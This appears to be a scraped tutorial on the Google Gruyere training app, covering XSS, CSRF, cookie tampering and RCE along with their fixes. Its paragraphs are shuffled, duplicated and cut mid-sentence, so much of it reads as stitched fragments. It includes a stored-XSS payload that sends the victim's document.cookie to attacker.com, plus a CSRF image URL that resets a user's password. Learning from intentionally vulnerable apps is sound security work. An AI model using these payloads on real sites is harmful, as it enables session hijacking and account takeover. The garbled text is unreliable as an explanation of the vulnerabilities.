Gruyere Learn Web Application Exploits Defenses Top Online
Gruyere does not check anti-CSRF tokens on state-changing operations (like changing a password or deleting a snippet). An attacker can embed an invisible image in a malicious site that points to http://gruyere/set_password?new=evil . The Impact: Forcing a logged-in user to perform unwanted actions. The Defense: Synchronizer Token Pattern. Generate a unique, unpredictable token for each user session and validate it for every POST/PUT/DELETE request. Gruyere’s solution page shows you exactly how to add this.
Why Gruyere is Essential for Developers and Security Professionals
Users should only have the access necessary for their specific role. Summary: Building a "Hole-Free" App
Master Web App Hacking with Google Gruyere: Top Exploits and Defenses
Gruyere’s "Profile settings" – the age field. Step 1: Exploit Input: 35<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> The app saves this to the datastore. Step 2: Consequence Every time an admin views your profile, their admin session cookie is sent to the attacker’s server. The attacker reloads the page as the admin. Step 3: The Fix (Code Level) Replace: self.response.write("<div>Age: %s</div>" % user.age) With: self.response.write("<div>Age: %s</div>" % cgi.escape(user.age)) gruyere learn web application exploits defenses top
: RCE is the holy grail for an attacker. It allows them to execute arbitrary operating system commands on the server, effectively gaining complete control over the application and the underlying machine.
Google developed Gruyere as a "cheesy" and intentionally vulnerable web application designed for students and security researchers to practice in a safe environment. It allows users to play the role of a malicious hacker to find security bugs and then learn how to fix them. Key Vulnerabilities Covered
To fix the Gruyere profile feature, a developer would look at:
In the "Privilege Separation" section, Gruyere demonstrates how to set the HttpOnly and Secure flags on cookies. Gruyere does not check anti-CSRF tokens on state-changing
) to clean HTML and user-supplied data before it is rendered or processed. Whitelist Filtering
Every challenge includes an "Exploit and Fix" section that provides a brief overview of the vulnerability and the specific code required to patch it. Google Gruyere For a structured academic overview, you might also find the Google Gruyere Security Assessment Report
Object handling Exploit: Attacker crafts a malicious serialized object that executes arbitrary code upon deserialization (e.g., Java, PHP, Python pickle).
Separate the query structure from the data. Ensure the interpreter treats user input strictly as data, never as executable code. The Defense: Synchronizer Token Pattern
The attacker injects a script into data stored permanently on the server (e.g., database, comment section). Every user who views the infected page executes the payload.
It provides a safe sandbox to practice, which is more effective than theoretical knowledge.
: Web applications use cookies to remember who you are. Since these cookies are stored on the client side (your browser), they are vulnerable to manipulation. A smart application will add a hash to the cookie to protect it, but poor implementation can be bypassed.
Learning web application security is a cycle of offense and defense. because it compresses a decade of security mistakes into a 5-page web app. By spending a weekend with Gruyere, you will move from being a developer who hopes the code is secure to an engineer who knows how to test and break it.